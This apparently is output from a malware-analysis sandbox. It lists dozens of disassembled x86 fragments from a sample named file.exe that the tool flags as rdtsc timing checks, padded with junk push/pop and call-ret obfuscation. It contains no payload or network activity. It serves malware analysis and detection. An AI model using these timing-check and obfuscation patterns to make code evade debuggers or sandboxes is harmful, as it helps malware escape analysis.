Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A9CD3 second address: 13A9D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F4379371468h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 mov di, 219Dh 0x0000002b xchg eax, ebx 0x0000002c je 00007F4379371474h 0x00000032 push eax 0x00000033 push edx 0x00000034 je 00007F4379371466h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A9D16 second address: 13A9D23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A9D23 second address: 13A9D29 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AA557 second address: 13AA56D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F437936CE32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB050 second address: 13AB054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB054 second address: 13AB05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AC320 second address: 13AC325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB05A second address: 13AB064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F437936CE26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AC325 second address: 13AC34A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F4379371466h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4379371474h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ACEAC second address: 13ACEB1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ACC5B second address: 13ACC61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ACC61 second address: 13ACC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ACF4D second address: 13ACF5A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4379371466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ACF5A second address: 13ACF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ecx 0x0000000a jl 00007F437936CE2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AE36C second address: 13AE372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AE372 second address: 13AE385 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F437936CE28h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AEC3D second address: 13AEC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B6417 second address: 13B6428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F437936CE2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B6428 second address: 13B642E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B642E second address: 13B6432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B54A1 second address: 13B54B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F437937146Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B73E7 second address: 13B73F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F437936CE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6578 second address: 13B6582 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F437937146Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B849E second address: 13B84A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B84A2 second address: 13B84A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B84A8 second address: 13B8507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F437936CE35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F437936CE28h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 cld 0x00000029 push 00000000h 0x0000002b sub edi, 5E20CDBDh 0x00000031 xchg eax, esi 0x00000032 jmp 00007F437936CE30h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8507 second address: 13B850B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B850B second address: 13B8511 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B966A second address: 13B967C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F437937146Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B967C second address: 13B969B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F437936CE32h 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB256 second address: 13BB260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4379371466h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B969B second address: 13B96A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F437936CE26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB260 second address: 13BB283 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4379371466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4379371474h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB283 second address: 13BB288 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB288 second address: 13BB2CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov ebx, 33D68FA7h 0x0000000d jmp 00007F437937146Ch 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F4379371468h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov ebx, dword ptr [ebp+122D1B82h] 0x00000036 xchg eax, esi 0x00000037 push ebx 0x00000038 push edi 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BE1C5 second address: 13BE1CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BC4F2 second address: 13BC4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD41B second address: 13BD41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB44D second address: 13BB457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4379371466h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BE3A7 second address: 13BE3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F437936CE26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BC5AB second address: 13BC5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB507 second address: 13BB514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BE4E2 second address: 13BE4E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB514 second address: 13BB51E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F437936CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0325 second address: 13C0329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C29E0 second address: 13C29F7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4379442F58h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jne 00007F4379442F56h 0x00000016 pop esi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C04CF second address: 13C04D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4378D2BA26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C29F7 second address: 13C29FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C29FD second address: 13C2A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D2BA32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c add dword ptr [ebp+122D2F6Fh], edi 0x00000012 jmp 00007F4378D2BA2Ch 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F4378D2BA28h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 xor dword ptr [ebp+122D1B3Ch], edi 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F4378D2BA28h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 jmp 00007F4378D2BA2Ah 0x0000005a push eax 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2A81 second address: 13C2AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379442F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2C16 second address: 13C2C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2C1A second address: 13C2C30 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4379442F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F4379442F58h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2C30 second address: 13C2CBC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4378D2BA2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F4378D2BA28h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F4378D2BA28h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D2EFDh], ecx 0x0000004c mov dword ptr fs:[00000000h], esp 0x00000053 clc 0x00000054 mov eax, dword ptr [ebp+122D1625h] 0x0000005a mov ebx, dword ptr [ebp+122D1BF3h] 0x00000060 push FFFFFFFFh 0x00000062 or bh, 00000052h 0x00000065 push eax 0x00000066 mov dword ptr [ebp+122D3002h], edx 0x0000006c pop ebx 0x0000006d nop 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F4378D2BA2Ah 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2CBC second address: 13C2CC6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4379442F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CAB4D second address: 13CAB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4378D2BA35h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDE0E second address: 13CDE14 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDE14 second address: 13CDE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4378D2BA37h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDE34 second address: 13CDE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0291 second address: 13D02BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F4378D2BA2Dh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F4378D2BA2Ch 0x00000014 mov eax, dword ptr [eax] 0x00000016 push edx 0x00000017 jl 00007F4378D2BA2Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D02BF second address: 13D02D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jl 00007F4379442F56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D02D2 second address: 13D02DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6BEF second address: 13D6C09 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4379442F5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F4379442F56h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D59F4 second address: 13D5A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4378D2BA35h 0x00000009 jl 00007F4378D2BA26h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F4378D2BA2Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6141 second address: 13D6162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379442F68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6162 second address: 13D6176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F4378D2BA26h 0x0000000e jc 00007F4378D2BA26h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D62AC second address: 13D62B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4379442F56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D62B6 second address: 13D62BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D62BA second address: 13D62EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4379442F67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4379442F60h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D63F1 second address: 13D63F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D63F5 second address: 13D63FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D63FD second address: 13D6403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6403 second address: 13D641B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4379442F64h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D641B second address: 13D642E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D2BA2Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D642E second address: 13D6461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4379442F5Fh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4379442F5Ch 0x00000014 jns 00007F4379442F5Eh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9747 second address: 13D974D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D974D second address: 13D9753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9753 second address: 13D975F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4378D2BA26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D975F second address: 13D9763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9763 second address: 13D9782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4378D2BA35h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC996 second address: 13DC99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC99A second address: 13DC9F4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4378D2BA26h 0x00000008 jmp 00007F4378D2BA35h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 jnl 00007F4378D2BA26h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d jl 00007F4378D2BA35h 0x00000023 jmp 00007F4378D2BA2Fh 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F4378D2BA34h 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC9F4 second address: 13DC9FE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC9FE second address: 13DCA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13680AE second address: 13680B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13680B4 second address: 13680B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E29A5 second address: 13E29CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 ja 00007F4379442F6Dh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E29CA second address: 13E29D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136EA95 second address: 136EA9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136EA9A second address: 136EAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
